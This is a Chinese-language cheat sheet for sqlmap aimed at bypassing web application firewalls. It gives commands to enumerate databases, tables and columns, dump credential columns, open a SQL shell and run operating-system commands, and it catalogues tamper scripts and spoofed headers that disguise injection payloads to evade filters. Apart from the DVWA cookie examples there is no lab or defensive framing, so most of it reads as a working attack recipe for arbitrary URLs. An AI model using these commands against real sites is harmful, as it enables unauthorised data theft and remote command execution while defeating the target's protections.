sqlmap 繞過WAF

1、基本的語法

sqlmap 更新  sqlmap -update

具體的使用方法：

sqlmap -u url --current-user

sqlmap -u url --current-db

sqlmap -u url --tables -D "db_name"

sqlmap -u url --columns -T "tablename" users -D "db_name" -v 0

sqlmap -u url --dump -C "column_name" -T  "table_name" -D "db_name" -v

sqlmap -u url --privileges -U root

sqlmap -u url --proxy "http://127.0.0.1:8080" 代理注入

sqlmap -u url --SQL-shell

sqlmap -u url  -dump-all -v 0

sqlmap -u url --os-cmd=whoami

sqlmap -u url --tamper 通過編碼繞過WAF

sqlmap -u url --technique  指定注入類型

1、1  使用cokire 或者 post作為參數：

  sqlmap.py -u "url " --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1"--current-db

  sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa --table
  sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users --column
 sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users -C user,password --dump
 使用  -r參數 提交  HTTP頭信息的文本
//讀取表中全部字段值
  Sqlmap.py -u “url” -D dvwa -T users --dump‘’
使用寬字節注入：

     POST數據包修改 添加 關鍵字部分使用 寬字節，比方說  name=121*&submit=%E6%9F%A5%   跑不出來的時候使tapmer

2、繞過WAF

判斷是不是安裝了 Waf       sqlmap.py -u “http://www.xxx.com” --identify-waf

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

還有其他的空格替換腳本 space2mssqlblank.py and space2mysqlblank.py

charencode.py andchardoubleencode.py是兩個用來打亂編碼的tamper腳本，他們在繞過不同的關鍵詞過濾時很有作用。

如果web應用使用asp/asp.net開發，charunicodeencode.py和percentage.py可以幫助你逃避Waf的檢測。

 

空格被過濾可以使用space2comment.py ， 過濾系統對大小寫敏感可以使用randomcase.py

對應的腳本還有很多，這里我直接導出網上整理好的。

 

• 使用方法--tamper xxx.py
• apostrophemask.py用UTF-8全角字符替換單引號字符
• apostrophenullencode.py 用非法雙字節unicode字符替換單引號字符
• appendnullbyte.py在payload末尾添加空字符編碼
• base64encode.py 對給定的payload全部字符使用Base64編碼
• between.py分別用“NOT BETWEEN 0 AND #”替換大於號“>”，“BETWEEN # AND #”替換等於號“=”
• bluecoat.py 在SQL語句之后用有效的隨機空白符替換空格符，隨后用“LIKE”替換等於號“=”
• chardoubleencode.py 對給定的payload全部字符使用雙重URL編碼（不處理已經編碼的字符）
• charencode.py 對給定的payload全部字符使用URL編碼（不處理已經編碼的字符）
• charunicodeencode.py 對給定的payload的非編碼字符使用Unicode URL編碼（不處理已經編碼的字符）
• concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替換像“CONCAT(A, B)”的實例
• equaltolike.py 用“LIKE”運算符替換全部等於號“=”
• greatest.py 用“GREATEST”函數替換大於號“>”
• halfversionedmorekeywords.py 在每個關鍵字之前添加MySQL注釋
• ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替換像“IFNULL(A, B)”的實例
• lowercase.py 用小寫值替換每個關鍵字字符
• modsecurityversioned.py 用注釋包圍完整的查詢
• modsecurityzeroversioned.py 用當中帶有數字零的注釋包圍完整的查詢
• multiplespaces.py 在SQL關鍵字周圍添加多個空格
• nonrecursivereplacement.py 用representations替換預定義SQL關鍵字，適用於過濾器
• overlongutf8.py 轉換給定的payload當中的所有字符
• percentage.py 在每個字符之前添加一個百分號
• randomcase.py 隨機轉換每個關鍵字字符的大小寫
• randomcomments.py 向SQL關鍵字中插入隨機注釋
• securesphere.py 添加經過特殊構造的字符串
• sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
• space2comment.py 用“/**/”替換空格符
• space2dash.py 用破折號注釋符“--”其次是一個隨機字符串和一個換行符替換空格符
• space2hash.py 用磅注釋符“#”其次是一個隨機字符串和一個換行符替換空格符
• space2morehash.py 用磅注釋符“#”其次是一個隨機字符串和一個換行符替換空格符
• space2mssqlblank.py 用一組有效的備選字符集當中的隨機空白符替換空格符
• space2mssqlhash.py 用磅注釋符“#”其次是一個換行符替換空格符
• space2mysqlblank.py 用一組有效的備選字符集當中的隨機空白符替換空格符
• space2mysqldash.py 用破折號注釋符“--”其次是一個換行符替換空格符
• space2plus.py 用加號“+”替換空格符
• space2randomblank.py 用一組有效的備選字符集當中的隨機空白符替換空格符
• unionalltounion.py 用“UNION SELECT”替換“UNION ALL SELECT”
• unmagicquotes.py 用一個多字節組合%bf%27和末尾通用注釋一起替換空格符
• varnish.py 添加一個HTTP頭“X-originating-IP”來繞過WAF
• versionedkeywords.py 用MySQL注釋包圍每個非函數關鍵字
• versionedmorekeywords.py 用MySQL注釋包圍每個關鍵字
• xforwardedfor.py 添加一個偽造的HTTP頭“X-Forwarded-For”來繞過WAF